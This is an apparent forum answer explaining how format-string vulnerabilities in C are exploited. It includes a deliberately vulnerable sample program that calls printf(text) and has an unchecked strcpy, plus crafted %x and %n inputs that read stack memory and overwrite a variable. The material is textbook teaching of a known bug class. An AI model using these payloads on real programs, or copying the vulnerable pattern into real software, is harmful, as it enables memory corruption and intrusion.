How can a Format-String vulnerability be exploited?

by

You may be able to exploit a format string vulnerability in many ways, directly or indirectly. Let’s use the following as an example (assuming no relevant OS protections, which is very rare anyways):

int main(int argc, char **argv)
{
    char text[1024];
    static int some_value = -72;

    strcpy(text, argv[1]); /* ignore the buffer overflow here */

    printf("This is how you print correctly:\n");
    printf("%s", text);
    printf("This is how not to print:\n");
    printf(text);

    printf("some_value @ 0x%08x = %d [0x%08x]", &some_value, some_value, some_value);
    return(0);
}

The basis of this vulnerability is the behaviour of functions with variable arguments. A function which implements handling of a variable number of parameters has to read them from the stack, essentially. If we specify a format string that will make printf() expect two integers on the stack, and we provide only one parameter, the second one will have to be something else on the stack. By extension, and if we have control over the format string, we can have the two most fundamental primitives:

Reading from arbitrary memory addresses

[EDIT] IMPORTANT: I’m making some assumptions about the stack frame layout here. You can ignore them if you understand the basic premise behind the vulnerability, and they vary across OS, platform, program and configuration anyways.

It’s possible to use the %s format parameter to read data. You can read the data of the original format string in printf(text), hence you can use it to read anything off the stack:

./vulnerable AAAA%08x.%08x.%08x.%08x
This is how you print correctly:
AAAA%08x.%08x.%08x.%08x
This is how not to print:
AAAA.XXXXXXXX.XXXXXXXX.XXXXXXXX.41414141
some_value @ 0x08049794 = -72 [0xffffffb8]

Writing to arbitrary memory addresses

You can use the %n format specifier to write to an arbitrary address (almost). Again, let’s assume our vulnerable program above, and let’s try changing the value of some_value, which is located at 0x08049794, as seen above:

./vulnerable $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
This is how you print correctly:
??%08x.%08x.%08x.%n
This is how not to print:
??XXXXXXXX.XXXXXXXX.XXXXXXXX.
some_value @ 0x08049794 = 31 [0x0000001f]

We’ve overwritten some_value with the number of bytes written before the %n specifier was encountered (man printf). We can use the format string itself, or field width to control this value:

./vulnerable $(printf "\x94\x97\x04\x08")%x%x%x%n
This is how you print correctly:
??%x%x%x%n
This is how not to print:
??XXXXXXXXXXXXXXXXXXXXXXXX
some_value @ 0x08049794 = 21 [0x00000015]

There are many possibilities and tricks to try (direct parameter access, large field width making wrap-around possible, building your own primitives), and this just touches the tip of the iceberg. I would suggest reading more articles on fmt string vulnerabilities (Phrack has some mostly excellent ones, although they may be a little advanced) or a book which touches on the subject.

Disclaimer: the examples are taken [although not verbatim] from the book Hacking: The art of exploitation (2nd ed) by Jon Erickson.

More Related Contents:

  1. Do you use the TR 24731 ‘safe’ functions? [closed]
  2. Why are strlcpy and strlcat considered insecure?
  3. How to escape the % (percent) sign in C’s printf
  4. What is the use of the %n format specifier in C?
  5. Why is strtok() Considered Unsafe?
  6. Platform independent size_t Format specifiers in c?
  7. Why didn’t gcc (or glibc) implement _s functions?
  8. Why is printf with a single argument (without conversion specifiers) deprecated?
  9. Buffer overflow works in gdb but not without it
  10. Using a Single system() Call to Execute Multiple Commands in C
  11. What is the difference between %f and %lf in C?
  12. Algorithm to find the smallest number in an array in C [closed]
  13. Can x86’s MOV really be “free”? Why can’t I reproduce this at all?
  14. Can I share a file descriptor to another process on linux or are they local to the process?
  15. Return a `struct` from a function in C
  16. Assign one struct to another in C
  17. returning a pointer to a literal (or constant) character array (string)?
  18. Execution of printf() and Segmentation Fault
  19. Convert Bytes to Int / uint in C
  20. How do I get a thread ID from an arbitrary pthread_t?
  21. Problems with character input using scanf()
  22. use _ and __ in C programs [duplicate]
  23. Swapping pointers in C (char, int)
  24. warning: left shift count >= width of type
  25. Get scanf to quit when it reads a newline?
  26. Can I omit return from main in C? [duplicate]
  27. state machines tutorials [closed]
  28. Why do you have to link the math library in C?
  29. Why do you need an explicit `-lm` compiler option? [duplicate]
  30. C fundamentals: double variable not equal to double expression?

Leave a Comment